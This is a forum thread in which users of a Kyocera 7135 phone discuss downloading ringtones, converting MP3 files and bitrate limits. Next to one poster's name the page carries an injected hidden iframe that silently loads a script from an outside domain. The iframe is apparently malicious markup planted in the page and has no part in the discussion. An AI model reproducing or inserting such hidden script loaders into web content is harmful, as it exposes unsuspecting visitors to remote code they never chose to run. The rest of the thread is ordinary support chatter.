+ Reply to Thread

how to download a ringtone from a website

If a website offers you the ability to d/l a ringtone through a standard click the ringtone, your phone gets a web alert, then you go to the alert, and download the ringtone, and its on your phone. That is all through the openwave browser. However if your phone is a 7135, it says it does not support this type of download. How would you get this same ringtone? save it to your computer then simply synche your phone and transfer?

Dreaderus<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

no. Downloadable ringers are generally Imelody, or MIDI, neither are supported by the 7135. The 7135 needs MP3's converted into Palm database files.

Your not gonna get those from the web.

Re: how to download a ringtone from a website

Originally posted by dreaderus
    However if your phone is a 7135, it says it does not support this type of download. How would you get this same ringtone?
    I think the bigger question is, does the 7135 even support the ringtone? (no), much less the download of it. And why do you want "elevator music" on your 7135 when you can have the real thing?
    Please visit my picture site: Robert-O-Rama :)

Re Custom Ring tones (not of elevator persuasion): I created my own custom ringtone from a music file. To do so, I used a program called Acoustica which I purchased for the purpose of editing my MP3 files. I grabbed the song I wanted a piece of (in this case, the beginning of 'Tainted Love'), cut the remainder, and saved as an MP3. When I first did this, it did not work. However, on further investigation of this site, I learned that this was because of the too high bitrate that I was using. Fortunately, Acoustica allows me to manage my own bitrate; and I re-saved and downloaded. Works fine. When my phone rings now, it is with that "Doot, doot.....Doot, doot...". Pretty cool.

I found a site that has a bunch of Kyocera Ringers on it. They are all KWS files. Will these work on the 7135? How do I get these to my phone? It says I need the Kyocera Phone Desktop software. Did that come with my phone? Is that the same thing as the MP3/Ringer Maker software?

Any help would be appreciated.

Mike

Originally posted by Walcwlr
    I found a site that has a bunch of Kyocera Ringers on it. They are all KWS files. Will these work on the 7135? How do I get these to my phone? It says I need the Kyocera Phone Desktop software. Did that come with my phone? Is that the same thing as the MP3/Ringer Maker software?

Any help would be appreciated.

Mike
    Those are not for the 7135 (unless you want to take them and make them MP3's). The 7135 uses MP3's as a ringtone with the software included on the CD. Read this thread:

http://www.smartphonesource.com/vbul...ghlight=ringer

basically you can take any MP3 and make it a ringtone. In addition there are dozens of ringtones on this site that other people have made to share. If you still don't find what you want, if you have a song you want turned into a ringtone, post it in a thread and somebody will probably convert it for you.

Go to www.ringtonejukebox.com. Listen to the ringtones that strike your fancy, and if you like it, right-click on the link that says "click here" and you can save it as .MP3 to your hard drive...